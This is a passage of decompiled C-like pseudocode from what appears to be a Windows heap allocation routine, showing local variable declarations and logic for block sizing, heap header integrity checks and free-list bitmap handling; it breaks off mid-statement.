				signed int _v312;
				intOrPtr _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed short _v340;
				signed short _v348;
				signed int _v356;
				signed short _v364;
				signed short _v372;
				signed short _v380;
				signed short _v388;
				signed short _v396;
				signed short _v404;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t980;
				signed int _t985;
				char* _t988;
				signed int _t994;
				signed int _t998;
				signed int _t1004;
				signed char* _t1005;
				signed int _t1006;
				signed char* _t1007;
				signed int _t1008;
				signed char* _t1009;
				signed int _t1011;
				intOrPtr _t1012;
				signed int _t1026;
				signed char* _t1027;
				intOrPtr _t1036;
				signed int _t1037;
				signed char* _t1038;
				intOrPtr _t1047;
				signed int _t1052;
				signed int _t1053;
				intOrPtr _t1055;
				signed short* _t1056;
				signed int* _t1059;
				unsigned int* _t1066;
				signed int _t1069;
				signed int _t1071;
				signed int _t1073;
				signed short _t1075;
				void* _t1076;
				signed short _t1079;
				signed int _t1081;
				signed short _t1083;
				signed int* _t1085;
				signed char* _t1088;
				signed int _t1090;
				signed int _t1101;
				intOrPtr* _t1102;
				signed int _t1104;
				signed int _t1108;
				signed int _t1118;
				unsigned int _t1125;
				signed int _t1134;
				signed char _t1135;
				signed short _t1143;
				signed char _t1147;
				signed short _t1148;
				void* _t1149;
				signed short _t1154;
				signed int _t1157;
				intOrPtr* _t1163;
				intOrPtr* _t1164;
				signed int _t1171;
				signed int _t1172;
				intOrPtr* _t1180;
				intOrPtr* _t1181;
				signed int _t1184;
				signed int _t1189;
				signed short _t1191;
				intOrPtr _t1197;
				signed int _t1202;
				signed int _t1205;
				signed int _t1208;
				intOrPtr* _t1216;
				signed int _t1219;
				signed int* _t1226;
				signed int* _t1227;
				signed int _t1230;
				signed int _t1231;
				signed int _t1237;
				signed short* _t1241;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed short* _t1253;
				signed short* _t1257;
				signed int _t1263;
				signed int _t1265;
				signed short _t1266;
				signed int _t1269;
				signed int _t1271;
				signed int _t1274;
				signed short _t1302;
				signed short _t1306;
				intOrPtr _t1312;
				signed int _t1316;
				signed int _t1321;
				signed int _t1327;
				signed int _t1328;
				signed int _t1332;
				signed short* _t1334;
				signed short _t1336;
				signed int* _t1337;
				signed int _t1349;
				signed int _t1356;
				signed short _t1378;
				void* _t1379;
				signed short _t1384;
				signed int _t1385;
				signed int _t1389;
				intOrPtr* _t1391;
				signed short _t1393;
				signed int* _t1394;
				signed int _t1406;
				signed int _t1413;
				intOrPtr* _t1417;
				signed char _t1419;
				signed int _t1421;
				signed int _t1423;
				char _t1429;
				void* _t1436;
				signed int _t1440;
				signed int _t1441;
				signed short _t1443;
				signed int _t1444;
				unsigned int _t1447;
				signed int _t1449;
				signed short _t1450;
				signed int _t1452;
				signed short _t1454;
				signed short _t1455;
				signed char _t1464;
				signed int _t1469;
				unsigned int _t1472;
				intOrPtr* _t1473;
				signed int _t1482;
				signed int _t1484;
				signed int _t1486;
				signed int _t1487;
				signed short _t1495;
				intOrPtr _t1496;
				signed short _t1498;
				signed char _t1499;
				signed int _t1500;
				signed short* _t1501;
				signed int _t1502;
				signed short* _t1505;
				signed char* _t1510;
				signed char _t1513;
				intOrPtr _t1517;
				signed int* _t1518;
				signed char _t1519;
				signed int _t1520;
				signed short _t1521;
				intOrPtr _t1522;
				signed short _t1524;
				signed int _t1526;
				intOrPtr* _t1528;
				signed int _t1530;
				intOrPtr* _t1533;
				signed char _t1536;
				intOrPtr _t1537;
				intOrPtr _t1542;
				signed char _t1548;
				intOrPtr* _t1550;
				signed int _t1553;
				signed int _t1555;
				intOrPtr _t1564;
				intOrPtr _t1565;
				signed int _t1567;
				signed int _t1569;
				signed int _t1570;
				unsigned int _t1573;
				signed int _t1576;
				signed int _t1578;
				intOrPtr _t1599;
				signed int _t1605;
				signed short _t1608;
				void* _t1609;
				signed int _t1611;
				signed short _t1612;
				signed short _t1635;
				intOrPtr _t1636;
				signed short _t1638;
				signed short _t1641;
				signed int _t1643;
				signed int _t1646;
				signed int _t1653;
				unsigned int _t1661;
				signed int _t1662;
				intOrPtr _t1667;
				signed int _t1670;
				signed int _t1672;
				signed int _t1674;
				signed int _t1677;
				signed short _t1679;
				signed int _t1680;
				signed short* _t1688;
				signed int _t1690;
				signed short _t1691;
				intOrPtr _t1693;
				signed int _t1695;
				signed short _t1696;
				intOrPtr _t1698;
				signed short _t1700;
				unsigned int _t1705;
				signed int _t1708;
				intOrPtr _t1709;
				signed short _t1711;
				signed int _t1712;
				signed int _t1714;
				signed int _t1715;
				signed short _t1719;
				signed int _t1721;
				signed short _t1723;
				signed short _t1724;
				signed short _t1725;
				signed int _t1727;
				signed int _t1729;
				signed short _t1730;
				signed int _t1738;
				intOrPtr _t1739;
				signed short _t1743;
				unsigned int _t1745;
				signed int _t1757;
				signed char _t1767;
				signed int _t1768;
				signed char _t1771;
				signed int _t1774;
				signed short _t1775;
				signed int _t1777;
				signed short _t1778;
				signed int _t1784;
				unsigned int _t1789;
				signed int _t1790;
				signed int _t1791;
				intOrPtr* _t1792;
				signed int _t1793;
				signed int* _t1794;
				signed short* _t1795;
				signed int _t1796;
				signed short* _t1797;
				signed int* _t1798;
				short* _t1799;
				intOrPtr _t1800;
				signed int _t1801;
				signed short* _t1802;
				intOrPtr _t1803;
				signed int _t1804;
				intOrPtr* _t1805;
				intOrPtr* _t1806;
				signed int _t1807;
				signed int _t1808;
				void* _t1809;
				intOrPtr _t1810;
				signed int _t1812;
				unsigned int _t1814;
				unsigned int* _t1816;
				signed int _t1817;
				signed int _t1818;
				signed int _t1819;
				signed int _t1820;
				signed int* _t1821;
				signed int _t1822;
				signed int _t1825;
				signed int _t1826;
				intOrPtr _t1827;
				signed int _t1828;
				signed int* _t1829;
				signed int _t1830;
				signed int* _t1833;
				intOrPtr _t1834;
				signed int _t1837;
				void* _t1838;
				void* _t1839;
				void* _t1842;
				void* _t1843;
				void* _t1853;

				_t1658 = __edx;
				_t1460 = __ecx;
				_push(0xfffffffe);
				_push(0x1f09c1c8);
				_push(E1F00AD20);
				_push( *[fs:0x0]);
				_t1839 = _t1838 - 0x180;
				_t980 =  *0x1f0bb370;
				_v12 = _v12 ^ _t980;
				_push(_t980 ^ _t1837);
				 *[fs:0x0] =  &_v20;
				_t1440 = __edx;
				_v120 = __edx;
				_t1771 = __ecx;
				_v124 = __ecx;
				_v140 = 0;
				_v116 = 1;
				_v49 = 0;
				_v88 = 0;
				_v68 = 0;
				_v152 = 0;
				_t1784 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v116 = 0;
					 *_a16 = 4;
					_t985 = _a4;
					__eflags = _t985 - 0x7fffffff;
					if(_t985 <= 0x7fffffff) {
						__eflags = _t1440 & 0x61000000;
						if((_t1440 & 0x61000000) == 0) {
							L10:
							__eflags = _t985;
							if(_t985 == 0) {
								_t985 = 1;
							}
							_t1661 =  *((intOrPtr*)(_t1771 + 0x94)) + _t985 &  *(_t1771 + 0x98);
							__eflags = _t1661 - 0x10;
							if(_t1661 < 0x10) {
								_t1661 = 0x10;
							}
							_a8 = _t1661;
							_t1464 = _t1440 >> 0x00000004 & 0xffffffe1 | 0x00000001;
							_v56 = _t1464;
							__eflags = _t1440 & 0x3c000100;
							if((_t1440 & 0x3c000100) != 0) {
								L16:
								_t1464 = _t1464 | 0x00000002;
								_v56 = _t1464;
								_t1661 = _t1661 + 8;
								__eflags = _t1661;
								_a8 = _t1661;
							} else {
								__eflags =  *(_t1771 + 0xbc);
								if( *(_t1771 + 0xbc) != 0) {
									goto L16;
								}
							}
							_t1662 = _t1661 >> 3;
							__eflags = _t1662;
							_v40 = _t1662;
							goto L18;
						} else {
							__eflags = _t1440 & 0x10000000;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t1436 = E1F06F0A5(_t1440, _t1460, _t1658, _t1771, _t1784, __eflags, _t985);
								 *[fs:0x0] = _v20;
								return _t1436;
							}
						}
					} else {
						__eflags = 0;
						 *[fs:0x0] = _v20;
						return 0;
					}
				} else {
					_t1464 = 1;
					_v56 = 1;
					_t1662 = _t1784;
					_v40 = _t1662;
					if(_t1662 < 2) {
						_a8 = _a8 + 8;
						_t1662 = 2;
						_v40 = 2;
					}
					 *_a16 = 3;
					L18:
					_t1441 = _t1440 & 0x00800000;
					if(_t1441 != 0 && ( *( *[fs:0x30] + 0x68) & 0x00000800) == 0) {
						_t1464 = _t1464 | 0x00000008;
						_v56 = _t1464;
					}
					_v8 = 0;
					_t1851 = _v120 & 0x00000001;
					if((_v120 & 0x00000001) != 0) {
						L30:
						__eflags = _t1662 -  *((intOrPtr*)(_t1771 + 0x5c));
						if(_t1662 >  *((intOrPtr*)(_t1771 + 0x5c))) {
							__eflags =  *(_t1771 + 0x40) & 0x00000002;
							if(( *(_t1771 + 0x40) & 0x00000002) == 0) {
								_v180 = 0xc0000023;
								goto L516;
							} else {
								_t1789 = _a8 + 0x18;
								_a8 = _t1789;
								_a8 = _t1789;
								_t898 = _t1789 + 0xfff; // 0xfe7
								_t1469 = _t898 & 0xfffff000;
								_t994 = E1EFF68EA( *((intOrPtr*)(_t1771 + 0x1f8)) -  *((intOrPtr*)(_t1771 + 0x244)), _t1771, _t1771 + 0xd4);
								__eflags = _t994;
								if(_t994 != 0) {
									_v328 = (E1EFC2330(_t1469) & 0x0000000f) << 0xc;
									_t1666 =  &_a8;
									_t998 = E1F017948(_t1771,  &_a8, (E1EFC2330(_t1469) & 0x0000000f) << 0xc,  &_v256);
									_t1790 = _t998;
									_v68 = _t1790;
									__eflags = _t1790;
									if(_t1790 != 0) {
										_t1791 = _v68;
										_t1472 = _a8;
										 *(_t1791 + 0x18) = _t1472 - _a4;
										 *(_t1791 + 0x1a) = _v56 | 0x00000002;
										 *(_t1791 + 0x10) = _t1472;
										 *((intOrPtr*)(_t1791 + 0x14)) = _v256;
										 *((char*)(_t1791 + 0x1f)) = 4;
										 *((intOrPtr*)(_t1771 + 0x200)) =  *((intOrPtr*)(_t1771 + 0x200)) + _t1472;
										_t1004 = E1EFD3C40();
										__eflags = _t1004;
										if(_t1004 == 0) {
											_t1005 = 0x7ffe0380;
										} else {
											_t1005 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1005;
										if( *_t1005 != 0) {
											_t1047 =  *[fs:0x30];
											__eflags =  *(_t1047 + 0x240) & 0x00000001;
											if(( *(_t1047 + 0x240) & 0x00000001) != 0) {
												_t1666 = _v68;
												E1F07EFD3(_t1441, _t1771, _v68, _a8, 9);
											}
										}
										_t1006 = E1EFD3C40();
										__eflags = _t1006;
										if(_t1006 == 0) {
											_t1007 = 0x7ffe0380;
										} else {
											_t1007 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1007;
										if( *_t1007 != 0) {
											_t1036 =  *[fs:0x30];
											__eflags =  *(_t1036 + 0x240) & 0x00000001;
											if(( *(_t1036 + 0x240) & 0x00000001) != 0) {
												_t1037 = E1EFD3C40();
												__eflags = _t1037;
												if(_t1037 == 0) {
													_t1038 = 0x7ffe0380;
												} else {
													_t1038 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
												}
												__eflags =  *(_t1771 + 0x74) << 3;
												_t1666 = _v68;
												E1F07F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1038 & 0x000000ff);
											}
										}
										_t1008 = E1EFD3C40();
										__eflags = _t1008;
										if(_t1008 == 0) {
											_t1009 = 0x7ffe038a;
										} else {
											_t1009 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										}
										__eflags =  *_t1009;
										if( *_t1009 != 0) {
											_t1026 = E1EFD3C40();
											__eflags = _t1026;
											if(_t1026 == 0) {
												_t1027 = 0x7ffe038a;
											} else {
												_t1027 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
											}
											__eflags =  *(_t1771 + 0x74) << 3;
											_t1666 = _v68;
											E1F07F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1027 & 0x000000ff);
										}
										__eflags =  *(_t1771 + 0x40) & 0x08000000;
										if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
											 *((short*)(_v68 + 8)) = E1EFEFDB9(1, _t1666);
										}
										_t1011 =  *( *[fs:0x30] + 0x68);
										_v332 = _t1011;
										__eflags = _t1011 & 0x00000800;
										if((_t1011 & 0x00000800) != 0) {
											__eflags = _v120 >> 0x12;
											 *((short*)(_v68 + 0xa)) = E1F069AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *(_t1791 + 0x10) >> 3, 1);
										}
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *(_t1791 + 0x1b) =  *(_t1791 + 0x1a) ^  *(_t1791 + 0x19) ^  *(_t1791 + 0x18);
											_t960 = _t1791 + 0x18;
											 *_t960 =  *(_t1791 + 0x18) ^  *(_t1771 + 0x50);
											__eflags =  *_t960;
										}
										_t1012 = _t1771 + 0x9c;
										_t1473 =  *((intOrPtr*)(_t1012 + 4));
										_t1667 =  *_t1473;
										__eflags = _t1667 - _t1012;
										if(_t1667 != _t1012) {
											__eflags = 0;
											E1F085FED(0xd, 0, _t1012, 0, _t1667, 0);
										} else {
											_t1792 = _v68;
											 *_t1792 = _t1012;
											 *((intOrPtr*)(_t1792 + 4)) = _t1473;
											 *_t1473 = _t1792;
											 *((intOrPtr*)(_t1012 + 4)) = _t1792;
										}
										_v88 = _v68 + 0x20;
									} else {
										_v88 = _t998;
										 *((intOrPtr*)(_t1771 + 0x224)) =  *((intOrPtr*)(_t1771 + 0x224)) + 1;
									}
								} else {
									_v180 = 0xc000012d;
									goto L516;
								}
							}
						} else {
							__eflags = _t1441;
							if(_t1441 == 0) {
								__eflags = _t1784 - ( *(_t1771 + 0xf0) & 0x0000ffff);
								_t1413 = _a4;
								if(_t1784 < ( *(_t1771 + 0xf0) & 0x0000ffff)) {
									__eflags = _t1413 -  *0x1f0b3928; // 0x4000
									if(__eflags <= 0) {
										_t1417 = (_t1784 >> 3) + 0xf2 + _t1771;
										_v72 = _t1417;
										_t1767 =  *_t1417;
										_t1464 = _t1784 & 0x00000007;
										_t1419 = 1 << _t1464;
										__eflags = _t1767 & _t1419;
										if((_t1767 & _t1419) == 0) {
											_t1833 =  *((intOrPtr*)(_t1771 + 0xec)) + _t1784 * 2;
											_v264 = _t1833;
											 *_t1833 =  *_t1833 + 0x21;
											_t1464 =  *_t1833;
											__eflags = _v152;
											if(_v152 != 0) {
												L45:
												_t1421 = _a4;
												__eflags = _t1421;
												_t1768 = _t1421;
												if(_t1421 == 0) {
													_t1768 = 1;
												}
												__eflags =  *((char*)(_t1771 + 0xea)) - 2;
												if( *((char*)(_t1771 + 0xea)) != 2) {
													_t1653 = 0;
													__eflags = 0;
												} else {
													_t1653 =  *(_t1771 + 0xe4);
												}
												_t1423 = E1EFBE2AA(_t1653, _t1768) & 0x0000ffff;
												_t1464 = 0xffff;
												__eflags = _t1423 - 0xffff;
												if(_t1423 == 0xffff) {
													__eflags =  *((char*)(_t1771 + 0xea)) - 2;
													if( *((char*)(_t1771 + 0xea)) != 2) {
														L54:
														_t90 = _t1771 + 0x48;
														 *_t90 =  *(_t1771 + 0x48) | 0x20000000;
														__eflags =  *_t90;
													} else {
														__eflags =  *(_t1771 + 0xe4);
														if( *(_t1771 + 0xe4) == 0) {
															goto L54;
														}
													}
												} else {
													 *_t1833 = _t1423;
													_t1464 = _v72;
													asm("bts eax, ebx");
													 *_t1464 =  *_t1464 & 0x000000ff;
													 *((intOrPtr*)(_t1771 + 0x23c)) =  *((intOrPtr*)(_t1771 + 0x23c)) + 1;
												}
											} else {
												__eflags = (_t1464 & 0x0000001f) - 0x10;
												if((_t1464 & 0x0000001f) > 0x10) {
													L44:
													_v188 = 1;
													goto L45;
												} else {
													__eflags = _t1464 - 0xff00;
													if(_t1464 > 0xff00) {
														goto L44;
													} else {
														_v188 = 0;
													}
												}
											}
										}
										_t1662 = _v40;
									}
								} else {
									__eflags = _t1413 -  *0x1f0b3928; // 0x4000
									if(__eflags <= 0) {
										__eflags =  *((char*)(_t1771 + 0xea)) - 2;
										if( *((char*)(_t1771 + 0xea)) != 2) {
											L36:
											__eflags =  *((char*)(_t1771 + 0xeb)) - 2;
											if( *((char*)(_t1771 + 0xeb)) == 2) {
												 *(_t1771 + 0x48) =  *(_t1771 + 0x48) | 0x20000000;
											}
										} else {
											__eflags =  *(_t1771 + 0xe4) - _t1441;
											if( *(_t1771 + 0xe4) == _t1441) {
												goto L36;
											}
										}
									}
								}
							}
							_t1793 = _a12;
							__eflags = _t1793;
							if(_t1793 == 0) {
								L95:
								_v204 = _t1771 + 0xc0;
								_t1794 =  *(_t1771 + 0xb4);
								_v44 = _t1794;
								while(1) {
									_t1482 = _t1794[1];
									__eflags = _t1662 - _t1482;
									if(_t1662 < _t1482) {
										break;
									}
									_t1052 =  *_t1794;
									__eflags = _t1052;
									if(_t1052 != 0) {
										_t1794 = _t1052;
										_v44 = _t1052;
										continue;
									} else {
										_t1053 = _t1482 - 1;
										L100:
										_v176 = _t1053;
									}
									L101:
									_v72 = _t1053;
									_v80 = _t1053 - _t1794[5];
									_v36 = 0;
									_t1670 = _t1794[6];
									_v96 = _t1670;
									_t1055 =  *((intOrPtr*)(_t1670 + 4));
									__eflags = _t1670 - _t1055;
									if(_t1670 != _t1055) {
										_t1056 = _t1055 + 0xfffffff8;
										_v32 = _t1056;
										_t1443 =  *_t1056;
										_v348 = _t1443;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											_t1443 = _t1443 ^  *(_t1771 + 0x50);
											_v348 = _t1443;
											__eflags = _t1443 >> 0x18 - (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443);
											if(_t1443 >> 0x18 != (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443)) {
												E1F085FED(3, _t1771, _v32, 0, 0, 0);
												_t1670 = _v96;
											}
										}
										_t1484 = _v40 - (_t1443 & 0x0000ffff);
										_v276 = _t1484;
										__eflags = _t1484;
										if(_t1484 <= 0) {
											_t1059 =  *_t1670 + 0xfffffff8;
											_v32 = _t1059;
											_t1444 =  *_t1059;
											_v356 = _t1444;
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												_t1444 = _t1444 ^  *(_t1771 + 0x50);
												_v356 = _t1444;
												__eflags = _t1444 >> 0x18 - (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444);
												if(_t1444 >> 0x18 != (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444)) {
													E1F085FED(3, _t1771, _v32, 0, 0, 0);
													_t1670 = _v96;
												}
											}
											_t1486 = _v40 - (_t1444 & 0x0000ffff);
											_v280 = _t1486;
											__eflags = _t1486;
											if(_t1486 > 0) {
												__eflags =  *_t1794;
												if( *_t1794 != 0) {
													L127:
													_t1487 = _v80;
													_t1672 = _t1487 >> 5;
													_v32 = (_t1794[1] - _t1794[5] >> 5) - 1;
													_t1066 = _t1794[7] + _t1672 * 4;
													_t1447 = (_t1444 | 0xffffffff) << (_t1487 & 0x0000001f) &  *_t1066;
													__eflags = _t1447;
													_t1486 = _v32;
													while(1) {
														_v200 = _t1066;
														_v156 = _t1672;
														__eflags = _t1447;
														if(_t1447 != 0) {
															break;
														}
														__eflags = _t1672 - _t1486;
														if(_t1672 > _t1486) {
															__eflags = _t1447;
															if(_t1447 == 0) {
																L475:
																_t1794 =  *_t1794;
																_v44 = _t1794;
																_t1053 = _t1794[5];
																goto L100;
															} else {
																break;
															}
														} else {
															_t1066 =  &(_t1066[1]);
															_t1447 =  *_t1066;
															_t1672 = _t1672 + 1;
															continue;
														}
														goto L143;
													}
													__eflags = _t1447;
													if(_t1447 == 0) {
														_t1069 = _t1447 >> 0x00000010 & 0x000000ff;
														__eflags = _t1069;
														if(_t1069 == 0) {
															_t1071 = ( *((_t1447 >> 0x18) + 0x1ef989b0) & 0x000000ff) + 0x18;
															__eflags = _t1071;
														} else {
															_t1071 = ( *(_t1069 + 0x1ef989b0) & 0x000000ff) + 0x10;
														}
													} else {
														_t1356 = _t1447 & 0x000000ff;
														__eflags = _t1447;
														if(_t1447 == 0) {
															_t1071 = ( *((_t1447 >> 0x00000008 & 0x000000ff) + 0x1ef989b0) & 0x000000ff) + 8;
														} else {
															_t1071 =  *(_t1356 + 0x1ef989b0) & 0x000000ff;
														}
													}
													_t1674 = (_t1672 << 5) + _t1071;
													_v156 = _t1674;
													__eflags = _t1794[2];
													if(_t1794[2] != 0) {
														_t1674 = _t1674 + _t1674;
														__eflags = _t1674;
													}
													_t1073 =  *(_t1794[8] + _t1674 * 4);
													goto L142;
												} else {
													__eflags = _v72 - _t1794[1] - 1;
													if(_v72 != _t1794[1] - 1) {
														goto L127;
													} else {
														_t1486 = _v80;
														__eflags = _t1794[2];
														if(_t1794[2] != 0) {
															_t1486 = _t1486 + _t1486;
															__eflags = _t1486;
														}
														_t1825 =  *(_t1794[8] + _t1486 * 4);
														while(1) {
															__eflags = _t1670 - _t1825;
															if(_t1670 == _t1825) {
																break;
															}
															_t1752 = _t1825 - 8;
															_t1454 =  *(_t1825 - 8);
															_v364 = _t1454;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1454 = _t1454 ^  *(_t1771 + 0x50);
																_v364 = _t1454;
																__eflags = _t1454 >> 0x18 - (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454);
																if(_t1454 >> 0x18 != (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454)) {
																	E1F085FED(3, _t1771, _t1752, 0, 0, 0);
																}
															}
															_t1486 = _v40 - (_t1454 & 0x0000ffff);
															_v284 = _t1486;
															__eflags = _t1486;
															if(_t1486 > 0) {
																_t1825 =  *_t1825;
																_t1670 = _v96;
																continue;
															} else {
																_t1073 = _t1825;
																_t1794 = _v44;
																goto L142;
															}
															goto L143;
														}
														_t1073 = _v36;
														_t1794 = _v44;
													}
												}
											} else {
												_t1073 =  *_t1670;
												goto L142;
											}
										} else {
											_t1073 = _t1670;
											goto L142;
										}
									} else {
										_t1073 = _t1670;
										L142:
										_v36 = _t1073;
									}
									L143:
									__eflags = _t1073;
									if(_t1073 == 0) {
										goto L475;
									}
									_v288 = _t1073;
									__eflags = _v204 - _t1073;
									if(_v204 == _t1073) {
										L186:
										_t1441 = E1EFD0445(_t1771, _a8);
										_v92 = _t1441;
										__eflags = _t1441;
										if(_t1441 == 0) {
											_v180 = 0xc0000017;
											L516:
											_v88 = 0;
										} else {
											_t350 = _t1441 + 8; // 0x8
											_t1795 = _t350;
											_t1495 =  *_t1795;
											_v32 = _t1495;
											_t1075 =  *(_t1441 + 0xc);
											_v48 = _t1075;
											_t1076 =  *_t1075;
											_t1496 =  *((intOrPtr*)(_t1495 + 4));
											__eflags = _t1076 - _t1496;
											if(_t1076 != _t1496) {
												L473:
												E1F085FED(0xd, _t1771, _t1795, _t1496, _t1076, 0);
												_v61 = 0;
											} else {
												__eflags = _t1076 - _t1795;
												if(_t1076 != _t1795) {
													goto L473;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
													_t1677 =  *(_t1771 + 0xb4);
													__eflags = _t1677;
													if(_t1677 != 0) {
														_t1605 =  *_t1441 & 0x0000ffff;
														while(1) {
															__eflags = _t1605 -  *((intOrPtr*)(_t1677 + 4));
															if(_t1605 <  *((intOrPtr*)(_t1677 + 4))) {
																break;
															}
															_t1321 =  *_t1677;
															__eflags = _t1321;
															if(_t1321 != 0) {
																_t1677 = _t1321;
																continue;
															} else {
																_t1605 =  *((intOrPtr*)(_t1677 + 4)) - 1;
																__eflags = _t1605;
															}
															break;
														}
														_v216 = _t1605;
														E1EFD036A(_t1771, _t1677, 1, _t1795, _t1605,  *_t1441 & 0x0000ffff);
													}
													_t1079 = _v32;
													_t1498 = _v48;
													 *_t1498 = _t1079;
													 *(_t1079 + 4) = _t1498;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L199:
														_v61 = 1;
														goto L200;
													} else {
														_t1316 = E1EFBF5C7(_t1771, _t1441);
														__eflags = _t1316;
														if(_t1316 != 0) {
															goto L199;
														} else {
															E1EFBF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v61 = 0;
														}
													}
												}
											}
										}
									} else {
										_t1441 = _t1073 - 8;
										_v92 = _t1441;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
											__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
											if(__eflags != 0) {
												_push(_t1486);
												E1F07D646(_t1441, _t1771, _t1441, _t1771, _t1794, __eflags);
											}
											_t1073 = _v36;
										}
										_t1819 =  *_t1441 & 0x0000ffff;
										__eflags = _t1819 - _v40;
										if(_t1819 < _v40) {
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
												 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
												__eflags =  *_t1441;
											}
											goto L186;
										} else {
											_t1738 =  *(_t1441 + 8);
											_v128 = _t1738;
											_t1608 =  *(_t1441 + 0xc);
											_v144 = _t1608;
											_t1609 =  *_t1608;
											_t1739 =  *((intOrPtr*)(_t1738 + 4));
											__eflags = _t1609 - _t1739;
											if(_t1609 != _t1739) {
												L183:
												E1F085FED(0xd, _t1771, _t1073, _t1739, _t1609, 0);
												_v58 = 0;
											} else {
												__eflags = _t1609 - _t1073;
												if(_t1609 != _t1073) {
													goto L183;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - _t1819;
													_t1611 =  *(_t1771 + 0xb4);
													_v44 = _t1611;
													__eflags = _t1611;
													if(_t1611 != 0) {
														_t1820 =  *_t1441 & 0x0000ffff;
														_v72 = _t1820;
														while(1) {
															_t1743 =  *(_t1611 + 4);
															__eflags = _t1820 - _t1743;
															if(_t1820 < _t1743) {
																break;
															}
															_t1349 =  *_t1611;
															__eflags = _t1349;
															if(_t1349 != 0) {
																_t1611 = _t1349;
																_v44 = _t1611;
																continue;
															} else {
																_t1820 = _t1743 - 1;
																_v72 = _t1820;
															}
															break;
														}
														_v208 = _t1820;
														_v108 =  *_t1441 & 0x0000ffff;
														_t1745 = _t1820 -  *((intOrPtr*)(_t1611 + 0x14));
														_v36 = _t1745;
														__eflags =  *(_t1611 + 8);
														_t1332 = _t1745 + _t1745;
														if( *(_t1611 + 8) == 0) {
															_t1332 = _t1745;
														}
														_t1774 = _t1332 * 4;
														_v80 = _t1774;
														_t1334 =  *((intOrPtr*)(_t1611 + 0x20)) + _t1774;
														_v96 = _t1334;
														_v32 =  *_t1334;
														 *((intOrPtr*)(_t1611 + 0xc)) =  *((intOrPtr*)(_t1611 + 0xc)) - 1;
														_t1336 =  *(_t1611 + 4);
														_t1775 = _t1336 - 1;
														_v48 = _t1775;
														__eflags = _t1820 - _t1775;
														_t1771 = _v124;
														if(_t1820 == _t1775) {
															_t293 = _t1611 + 0x10;
															 *_t293 =  *(_t1611 + 0x10) - 1;
															__eflags =  *_t293;
														}
														_t295 = _t1441 + 8; // 0xddeeddf6
														_t1821 = _t295;
														__eflags = _v32 - _t1821;
														if(_v32 == _t1821) {
															_v212 = _t1336;
															__eflags =  *_t1611;
															if( *_t1611 == 0) {
																_t1336 = _v48;
																_v212 = _t1336;
															}
															_t1822 =  *_t1821;
															_v32 =  *(_t1611 + 0x18);
															__eflags = _v72 - _t1336;
															_t1771 = _v124;
															if(_v72 >= _t1336) {
																_t1337 = _v96;
																__eflags = _t1822 - _v32;
																if(_t1822 == _v32) {
																	 *_t1337 = 0;
																	goto L177;
																} else {
																	 *_t1337 = _t1822;
																	goto L172;
																}
																goto L525;
															} else {
																__eflags = _t1822 -  *(_t1611 + 0x18);
																if(_t1822 ==  *(_t1611 + 0x18)) {
																	L176:
																	 *(_v80 +  *((intOrPtr*)(_t1611 + 0x20))) = 0;
																	L177:
																	_v36 = _t1745 & 0x0000001f;
																	_t333 = _v44 + 0x1c; // 0x0
																	 *( *_t333 + (_t1745 >> 5) * 4) =  *( *_t333 + (_t1745 >> 5) * 4) &  !(1 << _v36);
																} else {
																	_t1450 =  *(_t1822 - 8);
																	_v372 = _t1450;
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) != 0) {
																		_t1450 = _t1450 ^  *(_t1771 + 0x50);
																		_v372 = _t1450;
																		__eflags = _t1450 >> 0x18 - (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450);
																		if(_t1450 >> 0x18 != (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450)) {
																			E1F085FED(3, _t1771, _t1822 - 8, 0, 0, 0);
																			_t1745 = _v36;
																		}
																		_t1611 = _v44;
																	}
																	_t1452 = _v108 - (_t1450 & 0x0000ffff);
																	__eflags = _t1452;
																	_v292 = _t1452;
																	if(_t1452 != 0) {
																		_t1441 = _v92;
																		goto L176;
																	} else {
																		_t315 = _t1611 + 0x20; // 0xffffffe4
